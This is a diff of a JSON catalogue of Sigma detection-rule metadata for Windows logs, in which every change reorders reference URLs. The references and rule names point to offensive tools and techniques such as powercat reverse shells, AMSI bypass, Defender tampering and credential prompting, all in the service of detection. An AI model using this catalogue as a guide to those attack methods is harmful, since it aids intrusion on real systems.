 "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets",
+ "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml"
 ],
 "tags": [
@@ -21268,8 +21268,8 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/",
 "https://twitter.com/HunterPlaybook/status/1301207718355759107",
+ "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/",
 "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml"
 ],
@@ -21490,9 +21490,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password",
 "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa",
 "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml"
 ],
 "tags": [
@@ -21517,9 +21517,9 @@
 "logsource.category": "image_load",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
- "https://twitter.com/oulusoyum/status/1191329746069655553",
 "https://twitter.com/mattifestation/status/1196390321783025666",
+ "https://twitter.com/oulusoyum/status/1191329746069655553",
+ "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml"
 ],
 "tags": [
@@ -21659,9 +21659,9 @@
 "logsource.category": "wmi_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19",
- "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/",
 "https://github.com/RiccardoAncarani/LiquidSnake",
+ "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/",
+ "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml"
 ],
 "tags": [
@@ -21695,8 +21695,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://nmap.org/ncat/",
- "https://github.com/besimorhino/powercat",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
+ "https://github.com/besimorhino/powercat",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml"
 ],
 "tags": [
@@ -21729,8 +21729,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/bohops/WSMan-WinRM",
 "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/",
+ "https://github.com/bohops/WSMan-WinRM",
 "https://twitter.com/chadtilbury/status/1275851297770610688",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml"
 ],
@@ -21882,8 +21882,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml"
 ],
 "tags": [
@@ -21985,8 +21985,8 @@
 "logsource.category": "ps_classic_start",
 "logsource.product": "windows",
 "refs": [
- "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md",
+ "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml"
 ],
 "tags": [
@@ -22278,9 +22278,9 @@
 "logsource.category": "ps_module",
 "logsource.product": "windows",
 "refs": [
+ "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
 "https://www.mdeditor.tw/pl/pgRt",
 "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/",
- "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml"
 ],
 "tags": [
@@ -22338,8 +22338,8 @@
 "logsource.category": "ps_module",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/OTRF/detection-hackathon-apt29/issues/8",
 "https://threathunterplaybook.com/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.html",
+ "https://github.com/OTRF/detection-hackathon-apt29/issues/8",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml"
 ],
 "tags": [
@@ -22543,8 +22543,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://nmap.org/ncat/",
- "https://github.com/besimorhino/powercat",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md",
+ "https://github.com/besimorhino/powercat",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml"
 ],
 "tags": [
@@ -23084,8 +23084,8 @@
 "logsource.category": "ps_module",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md",
+ "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml"
 ],
 "tags": [
@@ -23285,8 +23285,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7",
 "https://attack.mitre.org/datasources/DS0005/",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml"
 ],
 "tags": [
@@ -23319,8 +23319,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
 "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/",
+ "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml"
 ],
 "tags": [
@@ -23454,8 +23454,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle",
 "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml"
 ],
 "tags": [
@@ -23578,9 +23578,9 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html",
 "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt",
+ "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml"
 ],
 "tags": [
@@ -23613,8 +23613,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md",
 "https://techgenix.com/malicious-powershell-scripts-evade-detection/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml"
 ],
 "tags": [
@@ -23717,10 +23717,10 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://adsecurity.org/?p=2277",
- "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon",
 "https://powersploit.readthedocs.io/en/stable/Recon/README",
 "https://thedfirreport.com/2020/10/08/ryuks-return",
+ "https://adsecurity.org/?p=2277",
+ "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml"
 ],
 "tags": [
@@ -23795,8 +23795,8 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
 "https://twitter.com/bohops/status/948061991012327424",
+ "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml"
 ],
 "tags": [
@@ -23862,9 +23862,9 @@
 "logsource.category": "ps_script",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2",
 "https://www.ietf.org/rfc/rfc2821.txt",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp",
+ "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml"
 ],
 "tags": [
@@ -23898,8 +23898,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf",
- "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/",
+ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml"
 ],
 "tags": [
@@ -24073,10 +24073,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", - "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", + "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", + "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", "http://woshub.com/manage-windows-firewall-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], @@ -24110,8 +24110,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", + "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" ], "tags": [ 
@@ -24236,9 +24236,9 @@ "logsource.product": "windows", "refs": [ "https://youtu.be/5mqid-7zp8k?t=2481", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -24447,8 +24447,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.powershellgallery.com/packages/DSInternals", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.006/T1003.006.md#atomic-test-2---run-dsinternals-get-adreplaccount", + "https://www.powershellgallery.com/packages/DSInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adreplaccount.yml" ], "tags": [ @@ -24507,8 +24507,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://adsecurity.org/?p=2604", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", + "https://adsecurity.org/?p=2604", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], 
@@ -24566,8 +24566,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" ], "tags": [ @@ -24692,8 +24692,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/5b67c9b141fa3918017f8fa44f2f88f0b1ecb9e1/atomics/T1562.001/T1562.001.md", + "https://docs.microsoft.com/en-us/powershell/module/dism/disable-windowsoptionalfeature?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_disable_windowsoptionalfeature.yml" ], "tags": [ @@ -24999,8 +24999,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://t.co/ezOTGy1a1G", "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://t.co/ezOTGy1a1G", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" ], "tags": [ 
@@ -25226,8 +25226,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", + "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" ], "tags": [ @@ -25423,8 +25423,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", + "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" ], "tags": [ @@ -25481,8 +25481,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" ], "tags": [ 
@@ -25595,8 +25595,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/Gerenios/AADInternals", "https://o365blog.com/aadinternals/", + "https://github.com/Gerenios/AADInternals", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml" ], "tags": [ @@ -25742,8 +25742,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "http://www.powertheshell.com/ntfsstreams/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" ], "tags": [ @@ -25785,8 +25785,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", "https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml" ], "tags": [ 
@@ -25844,8 +25844,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://www.offensive-security.com/metasploit-unleashed/timestomp/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_timestomp.yml" ], "tags": [ @@ -25911,8 +25911,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", "https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_hyper_v_condlet.yml" ], "tags": [ @@ -25945,8 +25945,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_acl_service.yml" ], "tags": [ 
@@ -25970,8 +25970,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://attack.mitre.org/datasources/DS0005/", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_create_volume_shadow_copy.yml" ], "tags": [ @@ -26004,8 +26004,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-1---enable-windows-remote-management", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_enable_psremoting.yml" ], "tags": [ @@ -26183,9 +26183,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" ], "tags": [ 
@@ -26218,8 +26218,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/", + "https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml" ], "tags": [ @@ -26311,8 +26311,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-4---user-discovery-with-env-vars-powershell-script", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md#atomic-test-5---getcurrent-user-with-powershell-script", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_current_user.yml" ], "tags": [ @@ -26336,8 +26336,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml" ], "tags": [ 
@@ -26361,8 +26361,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript_count.yml" ], "tags": [ @@ -26724,9 +26724,9 @@ "logsource.product": "windows", "refs": [ "https://gist.github.com/MHaggis/0dbe00ad401daa7137c81c99c268cfb7", - "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462", "https://github.com/hlldz/Phant0m/blob/30c2935d8cf4aafda17ee2fab7cd0c4aa9a607c2/old/Invoke-Phant0m.ps1", + "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/CodeExecution/Invoke-ReflectivePEInjection.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_keywords.yml" ], "tags": [ @@ -26850,8 +26850,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Start-Process?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.003/T1036.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_start_process.yml" ], "tags": [ 
